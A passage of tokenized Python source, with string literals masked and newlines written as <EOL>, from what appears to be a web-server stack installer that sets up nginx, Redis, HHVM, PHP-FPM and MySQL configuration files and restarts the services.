isfile ( "<STR_LIT>" ) and ( not <EOL> os . path . isfile ( "<STR_LIT>" ) ) : <EOL> data = dict ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> if EEVariables . ee_platform_codename == '<STR_LIT>' : <EOL> if os . path . isfile ( "<STR_LIT>" ) and ( not <EOL> os . path . isfile ( "<STR_LIT>" ) ) : <EOL> data = dict ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> if os . path . isfile ( "<STR_LIT>" ) : <EOL> if not EEFileUtils . grep ( self , "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) : <EOL> with open ( "<STR_LIT>" , <EOL> "<STR_LIT:a>" ) as redis_file : <EOL> redis_file . write ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if os . path . isfile ( "<STR_LIT>" ) and ( not <EOL> os . path . isfile ( "<STR_LIT>" ) ) : <EOL> with open ( "<STR_LIT>" , "<STR_LIT:a>" ) as redis_file : <EOL> redis_file . write ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if self . app . pargs . php7 : <EOL> if os . path . isdir ( "<STR_LIT>" ) and ( not <EOL> os . path . isfile ( "<STR_LIT>" ) ) : <EOL> data = dict ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . 
render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> if os . path . isdir ( "<STR_LIT>" ) and ( not os . path . isfile ( "<STR_LIT>" ) ) : <EOL> data = dict ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> if os . path . isfile ( "<STR_LIT>" ) : <EOL> if not EEFileUtils . grep ( self , "<STR_LIT>" , <EOL> "<STR_LIT>" ) : <EOL> with open ( "<STR_LIT>" , "<STR_LIT:a>" ) as php_file : <EOL> php_file . write ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if self . app . pargs . pagespeed : <EOL> if ( os . path . isfile ( '<STR_LIT>' ) and <EOL> ( not os . path . isfile ( '<STR_LIT>' ) ) ) : <EOL> data = dict ( ) <EOL> Log . 
debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> if set ( EEVariables . ee_hhvm ) . issubset ( set ( apt_packages ) ) : <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" ) <EOL> EEFileUtils . searchreplace ( self , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ) <EOL> EEFileUtils . searchreplace ( self , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ) <EOL> with open ( "<STR_LIT>" , "<STR_LIT:a>" ) as hhvm_file : <EOL> hhvm_file . write ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> with open ( "<STR_LIT>" , "<STR_LIT:a>" ) as hhvm_file : <EOL> hhvm_file . write ( "<STR_LIT>" ) <EOL> if os . path . isfile ( "<STR_LIT>" ) : <EOL> if not EEFileUtils . grep ( self , "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) : <EOL> with open ( "<STR_LIT>" , <EOL> "<STR_LIT:a>" ) as hhvm_file : <EOL> hhvm_file . write ( "<STR_LIT>" ) <EOL> if os . path . isfile ( "<STR_LIT>" ) : <EOL> if not EEFileUtils . grep ( self , "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) : <EOL> with open ( "<STR_LIT>" , <EOL> "<STR_LIT:a>" ) as hhvm_file : <EOL> hhvm_file . write ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT:\n>" ) <EOL> EEGit . add ( self , [ "<STR_LIT>" ] , msg = "<STR_LIT>" ) <EOL> EEService . restart_service ( self , '<STR_LIT>' ) <EOL> if os . path . isfile ( "<STR_LIT>" ) and ( not <EOL> os . path . isfile ( "<STR_LIT>" ) ) : <EOL> data = dict ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . 
debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> if not EEService . reload_service ( self , '<STR_LIT>' ) : <EOL> Log . error ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if set ( EEVariables . ee_redis ) . issubset ( set ( apt_packages ) ) : <EOL> if os . path . isfile ( "<STR_LIT>" ) and ( not <EOL> os . path . isfile ( "<STR_LIT>" ) ) : <EOL> data = dict ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> if os . path . isfile ( "<STR_LIT>" ) and ( not <EOL> os . path . isfile ( "<STR_LIT>" ) ) : <EOL> data = dict ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> if os . path . isfile ( "<STR_LIT>" ) : <EOL> if not EEFileUtils . grep ( self , "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) : <EOL> with open ( "<STR_LIT>" , <EOL> "<STR_LIT:a>" ) as redis_file : <EOL> redis_file . 
write ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if os . path . isfile ( "<STR_LIT>" ) and ( not <EOL> os . path . isfile ( "<STR_LIT>" ) ) : <EOL> with open ( "<STR_LIT>" , "<STR_LIT:a>" ) as redis_file : <EOL> redis_file . write ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if EEVariables . ee_platform_codename != '<STR_LIT>' and set ( EEVariables . ee_php ) . issubset ( set ( apt_packages ) ) : <EOL> if not os . path . exists ( '<STR_LIT>' ) : <EOL> Log . debug ( self , '<STR_LIT>' ) <EOL> os . makedirs ( '<STR_LIT>' ) <EOL> if ( EEVariables . ee_platform_distro == "<STR_LIT>" and <EOL> EEVariables . ee_platform_codename == '<STR_LIT>' ) : <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" ) <EOL> with open ( "<STR_LIT>" , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:a>' ) as myfile : <EOL> myfile . write ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEFileUtils . create_symlink ( self , [ "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ] ) <EOL> config = configparser . ConfigParser ( ) <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> config . read ( '<STR_LIT>' ) <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = EEVariables . ee_timezone <EOL> with open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) as configfile : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> config . write ( configfile ) <EOL> '''<STR_LIT>''' <EOL> data = dict ( pid = "<STR_LIT>" , error_log = "<STR_LIT>" , <EOL> include = "<STR_LIT>" ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> ee_php_fpm = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . 
render ( ( data ) , '<STR_LIT>' , out = ee_php_fpm ) <EOL> ee_php_fpm . close ( ) <EOL> config = configparser . ConfigParser ( ) <EOL> config . read_file ( codecs . open ( '<STR_LIT>' , <EOL> "<STR_LIT:r>" , "<STR_LIT:utf8>" ) ) <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT:100>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> with codecs . open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) as configfile : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> config . write ( configfile ) <EOL> EEFileUtils . copyfile ( self , "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> EEFileUtils . searchreplace ( self , "<STR_LIT>" <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> config = configparser . ConfigParser ( ) <EOL> config . read ( '<STR_LIT>' ) <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> with open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) as confifile : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> config . write ( confifile ) <EOL> with open ( "<STR_LIT>" , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:a>' ) as myfile : <EOL> myfile . write ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEFileUtils . 
searchreplace ( self , "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> if not os . path . exists ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) : <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> os . makedirs ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> open ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:a>' ) . close ( ) <EOL> open ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:a>' ) . close ( ) <EOL> if not os . path . exists ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) : <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> os . makedirs ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> with open ( "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) as myfile : <EOL> myfile . write ( "<STR_LIT>" ) <EOL> EEFileUtils . chown ( self , "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) , <EOL> EEVariables . ee_php_user , <EOL> EEVariables . ee_php_user , recursive = True ) <EOL> EEGit . add ( self , [ "<STR_LIT>" ] , msg = "<STR_LIT>" ) <EOL> EEService . restart_service ( self , '<STR_LIT>' ) <EOL> if EEVariables . ee_platform_codename == '<STR_LIT>' and set ( EEVariables . ee_php5_6 ) . issubset ( set ( apt_packages ) ) : <EOL> if not os . path . exists ( '<STR_LIT>' ) : <EOL> Log . debug ( self , '<STR_LIT>' ) <EOL> os . makedirs ( '<STR_LIT>' ) <EOL> config = configparser . ConfigParser ( ) <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> config . 
read ( '<STR_LIT>' ) <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = EEVariables . ee_timezone <EOL> with open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) as configfile : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> config . write ( configfile ) <EOL> '''<STR_LIT>''' <EOL> data = dict ( pid = "<STR_LIT>" , error_log = "<STR_LIT>" , <EOL> include = "<STR_LIT>" ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> ee_php_fpm = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , out = ee_php_fpm ) <EOL> ee_php_fpm . close ( ) <EOL> config = configparser . ConfigParser ( ) <EOL> config . read_file ( codecs . open ( '<STR_LIT>' , <EOL> "<STR_LIT:r>" , "<STR_LIT:utf8>" ) ) <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT:100>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> with codecs . open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) as configfile : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> config . write ( configfile ) <EOL> EEFileUtils . copyfile ( self , "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> EEFileUtils . 
searchreplace ( self , "<STR_LIT>" <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> config = configparser . ConfigParser ( ) <EOL> config . read ( '<STR_LIT>' ) <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> with open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) as confifile : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> config . write ( confifile ) <EOL> with open ( "<STR_LIT>" , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:a>' ) as myfile : <EOL> myfile . write ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if not EEShellExec . cmd_exec ( self , "<STR_LIT>" ) : <EOL> EEFileUtils . searchreplace ( self , "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> if not os . path . exists ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) : <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> os . makedirs ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> open ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:a>' ) . close ( ) <EOL> open ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:a>' ) . close ( ) <EOL> if not os . path . exists ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) : <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> os . makedirs ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> with open ( "<STR_LIT>" <EOL> . format ( EEVariables . 
ee_webroot ) , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) as myfile : <EOL> myfile . write ( "<STR_LIT>" ) <EOL> EEFileUtils . chown ( self , "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) , <EOL> EEVariables . ee_php_user , <EOL> EEVariables . ee_php_user , recursive = True ) <EOL> EEGit . add ( self , [ "<STR_LIT>" ] , msg = "<STR_LIT>" ) <EOL> EEService . restart_service ( self , '<STR_LIT>' ) <EOL> if EEVariables . ee_platform_codename == '<STR_LIT>' and set ( EEVariables . ee_php7_0 ) . issubset ( set ( apt_packages ) ) : <EOL> if not os . path . exists ( '<STR_LIT>' ) : <EOL> Log . debug ( self , '<STR_LIT>' ) <EOL> os . makedirs ( '<STR_LIT>' ) <EOL> config = configparser . ConfigParser ( ) <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> config . read ( '<STR_LIT>' ) <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = EEVariables . ee_timezone <EOL> with open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) as configfile : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> config . write ( configfile ) <EOL> '''<STR_LIT>''' <EOL> data = dict ( pid = "<STR_LIT>" , error_log = "<STR_LIT>" , <EOL> include = "<STR_LIT>" ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> ee_php_fpm = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , out = ee_php_fpm ) <EOL> ee_php_fpm . close ( ) <EOL> config = configparser . ConfigParser ( ) <EOL> config . read_file ( codecs . 
open ( '<STR_LIT>' , <EOL> "<STR_LIT:r>" , "<STR_LIT:utf8>" ) ) <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT:100>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> with codecs . open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) as configfile : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> config . write ( configfile ) <EOL> EEFileUtils . copyfile ( self , "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> EEFileUtils . searchreplace ( self , "<STR_LIT>" <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> config = configparser . ConfigParser ( ) <EOL> config . read ( '<STR_LIT>' ) <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> with open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) as confifile : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> config . write ( confifile ) <EOL> with open ( "<STR_LIT>" , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:a>' ) as myfile : <EOL> myfile . write ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if not EEShellExec . cmd_exec ( self , "<STR_LIT>" ) : <EOL> EEFileUtils . searchreplace ( self , "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> if not os . path . 
exists ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) : <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> os . makedirs ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> open ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:a>' ) . close ( ) <EOL> open ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:a>' ) . close ( ) <EOL> if not os . path . exists ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) : <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> os . makedirs ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> with open ( "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) as myfile : <EOL> myfile . write ( "<STR_LIT>" ) <EOL> EEFileUtils . chown ( self , "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) , <EOL> EEVariables . ee_php_user , <EOL> EEVariables . ee_php_user , recursive = True ) <EOL> EEGit . add ( self , [ "<STR_LIT>" ] , msg = "<STR_LIT>" ) <EOL> EEService . restart_service ( self , '<STR_LIT>' ) <EOL> if set ( EEVariables . ee_mysql ) . issubset ( set ( apt_packages ) ) : <EOL> if not os . path . isfile ( "<STR_LIT>" ) : <EOL> config = ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> config_file = open ( "<STR_LIT>" , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> config_file . write ( config ) <EOL> config_file . close ( ) <EOL> else : <EOL> try : <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> except CommandExecutionError as e : <EOL> Log . error ( self , "<STR_LIT>" ) <EOL> EEFileUtils . chmod 